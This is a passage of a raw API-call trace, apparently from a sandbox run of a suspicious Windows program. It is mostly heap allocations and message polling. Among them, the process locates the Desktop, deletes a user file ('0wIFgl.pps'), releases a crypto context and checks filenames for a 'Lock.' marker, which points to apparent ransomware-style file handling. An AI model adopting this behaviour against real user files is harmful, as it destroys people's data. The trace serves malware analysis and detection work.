lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0160.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0160.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0160.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0160.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0160.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0160.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0160.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0160.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0160.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0160.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0160.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0160.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0160.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0160.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0160.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0160.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0160.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0160.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0160.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0160.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0160.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0160.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0160.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0160.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0160.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0160.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0160.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0160.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0160.648] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0160.648] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0160.648] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0160.648] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0160.648] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0160.648] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0160.648] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0160.648] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0160.648] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0160.648] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0160.648] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0160.648] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0160.648] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0160.648] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0160.648] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0160.649] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0160.649] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0160.649] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0160.649] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0160.649] CryptReleaseContext (hProv=0xab2890, dwFlags=0x0) returned 1 [0160.649] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0160.649] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0160.649] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0160.649] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0160.649] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0160.649] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0160.649] FreeLibrary (hLibModule=0x74d40000) returned 1 [0160.649] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0160.649] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0160.649] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.650] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.651] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.651] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0160.651] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0160.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0160.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0160.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa920 [0160.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0160.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0160.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa908 [0160.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0160.651] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0160.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0160.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0160.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0160.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0160.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0160.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0160.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0160.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0160.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0160.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0160.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0160.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0160.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0160.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0160.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0160.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0160.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0160.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0160.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0160.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0160.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd0) returned 0x2416f30 [0160.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0160.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0160.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0160.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0160.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0160.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x62) returned 0x24202f0 [0160.653] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/0wIFgl.pps", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0wIFgl.pps", lpFilePart=0x8bedfc*="0wIFgl.pps") returned 0x30 [0160.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0160.653] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0wIFgl.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0wifgl.pps")) returned 0x20 [0160.653] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0wIFgl.pps", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd99e5710, ftCreationTime.dwHighDateTime=0x1d4ca34, ftLastAccessTime.dwLowDateTime=0x18807430, ftLastAccessTime.dwHighDateTime=0x1d4c711, ftLastWriteTime.dwLowDateTime=0x18807430, ftLastWriteTime.dwHighDateTime=0x1d4c711, nFileSizeHigh=0x0, nFileSizeLow=0xd6d0, dwReserved0=0x15, dwReserved1=0x4, cFileName="0wIFgl.pps", cAlternateFileName="")) returned 0xaa56a0 [0160.653] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0wIFgl.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0wifgl.pps")) returned 1 [0160.655] FindNextFileW (in: hFindFile=0xaa56a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd99e5710, ftCreationTime.dwHighDateTime=0x1d4ca34, ftLastAccessTime.dwLowDateTime=0x18807430, ftLastAccessTime.dwHighDateTime=0x1d4c711, ftLastWriteTime.dwLowDateTime=0x18807430, ftLastWriteTime.dwHighDateTime=0x1d4c711, nFileSizeHigh=0x0, nFileSizeLow=0xd6d0, dwReserved0=0x15, dwReserved1=0x4, cFileName="0wIFgl.pps", cAlternateFileName="")) returned 0 [0160.655] FindClose (in: hFindFile=0xaa56a0 | out: hFindFile=0xaa56a0) returned 1 [0160.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0160.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0160.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0160.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0160.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0160.656] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0160.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0160.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0160.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0160.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0160.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0160.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0160.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0160.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0160.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0160.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0160.656] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0160.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0160.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0160.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa908 [0160.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0160.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0160.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a96d8 [0160.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0160.656] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0160.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0160.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0160.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0160.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0160.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0160.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0160.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0160.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0160.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0160.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0160.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0160.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0160.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0160.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0160.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0160.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0160.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0160.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0160.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0160.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0160.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd0) returned 0x2416f30 [0160.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0160.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0160.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0160.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0160.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0160.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0160.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0160.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0160.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0160.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0160.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0160.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0160.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0160.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0160.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0160.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0160.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x62) returned 0x24202f0 [0160.658] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/0wIFgl.pps", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0wIFgl.pps", lpFilePart=0x8bf658*="0wIFgl.pps") returned 0x30 [0160.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0160.658] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0wIFgl.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0wifgl.pps")) returned 0xffffffff [0160.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0160.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0160.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0160.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0160.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0160.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0160.659] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0160.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0160.659] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0160.659] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0160.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0160.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0160.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0160.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0160.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0160.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0160.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0160.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0160.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0160.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0160.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0160.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0160.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0160.660] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5EdvDyyb.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0160.660] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EdvDyyb.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0160.660] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dvDyyb.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0160.660] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vDyyb.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0160.660] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Dyyb.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0160.660] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yyb.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0160.660] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yb.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0160.660] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0160.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0160.660] HeapFree (in: 